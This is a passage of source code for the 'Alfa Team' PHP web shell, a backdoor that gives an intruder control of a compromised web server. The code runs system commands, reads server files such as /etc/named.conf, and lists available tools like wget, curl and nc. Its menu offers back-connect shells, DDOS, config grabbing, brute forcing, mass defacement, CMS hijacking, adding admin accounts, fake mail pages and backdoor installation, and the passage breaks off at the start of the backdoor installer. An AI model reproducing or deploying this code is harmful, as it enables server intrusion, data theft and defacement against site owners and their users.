alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
</script>
<?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
<input type='hidden' name='a' value='dlfile'>
<input type='hidden' name='c' value=''>
<input type='hidden' name='file' value=''>
</form>
<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
<div id='a_loader'><img src='".__showicon('loader')."'></div>";
$cmd_uname = alfaEx("uname -a",false,false);
$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar_holder"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
for($s=1;$s<=10;$s++){
echo '<input type="hidden" name="alfa'.$s.'">';
}
echo '<input type="hidden" name="charset">
</form>
<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
<div class="header"><table width="100%" border="0">
<tr>
<td width="3%"><span class="header_vars">Uname:</span></td>
<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
</tr>
<tr>
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
if($GLOBALS['sys']=='unix'){
$d0mains = _alfa_file("/etc/named.conf",false);
if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
$count=0;
foreach($d0mains as $d0main){
if(@strstr($d0main,"zone")){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
flush();
$count++;}}}
echo "$count Domains";}}
else{echo("Cant Read [ /etc/named.conf ]");}
echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
</tr>';
if($GLOBALS['sys']=='unix'){
$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
if(!@ini_get('safe_mode')){
if(strlen(alfaEx("id",false,false))>0){
echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
$x=0;
foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>
<tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
$x=0;
foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
echo '</td>
</tr>';
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
}
}else{
echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
echo alfaEx('ver',false,false);
echo '</td>
</tr> <tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
</tr></b>';
}
$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
</tr>';
if($GLOBALS['sys']=="win"){
echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>'.$drives.'</b></td>
</tr>';
}
echo '<tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#action=fileman&path='.$GLOBALS['home_cwd'].'" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
$li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'
);
foreach($li as $key=>$value){
echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>'."\n");
}
echo '</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path='.$GLOBALS['cwd'].'&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=settings\';g(\'settings\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path='.$GLOBALS['cwd'].'&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=market\';g(\'market\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path='.$GLOBALS['cwd'].'&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=aboutus\';g(\'aboutus\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">About Us</a>'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>':'').'</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="'.$GLOBALS['cwd'].'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';}else{
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
}}
function alfalogout(){
@setcookie("AlfaUser", null, 2012);
@setcookie("AlfaPass", null, 2012);
unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
echo("ok");
}
function showAnimation($name){
  return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
}
function __showicon($r){
  $s['btn']='http://solevisible.com/images/btn.png';
  $s['alfamini']='http://solevisible.com/images/alfamini.png';
  $s['loader']='http://solevisible.com/images/loader.svg';
  //return 'data:image/png;base64,'.__get_resource($s[$r]);
  return $s[$r];
}
function alfainbackdoor(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
$success= '<font color="green">Success...!';
$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
